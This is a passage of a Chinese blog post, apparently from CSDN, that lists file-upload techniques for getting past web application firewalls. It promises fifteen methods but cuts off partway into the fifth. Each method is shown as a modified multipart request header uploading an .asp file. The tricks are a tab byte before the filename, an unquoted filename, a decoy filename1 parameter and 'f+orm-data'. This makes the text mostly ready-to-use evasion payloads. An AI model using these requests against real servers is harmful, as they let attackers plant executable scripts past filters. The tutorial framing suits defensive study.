文件上传绕过waf的方法

本文介绍了15种绕过Web应用防火墙(WAF)的文件上传方法,包括利用特殊字符、空格、换行、文件名变异、多Content-Disposition等技巧,旨在探讨安全防护中的潜在风险。

原始请求包:
——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=”cesafe.asp”

Content-Type: text/html

方法1,文件名前缀加[0x09]绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=”[0x09]cesafe.asp”

Content-Type: text/html

方法2,文件名去掉双引号绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=cesafe.asp

Content-Type: text/html

方法3,添加一个filename1的文件名参数,并赋值绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: form-data; name=”filepath”; filename=”cesafe.asp”;filename1=”test.jpg”

Content-Type: text/html

方法4,form变量改成f+orm组合绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D

Content-Disposition: f+orm-data; name=”filepath”;filename=”cesafe.asp”

Content-Type: text/html

方法5,文件名后缀大小写绕过:
——WebKitFormBoundary2smpsxFB3D0KbA7D

ConTent-Di

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值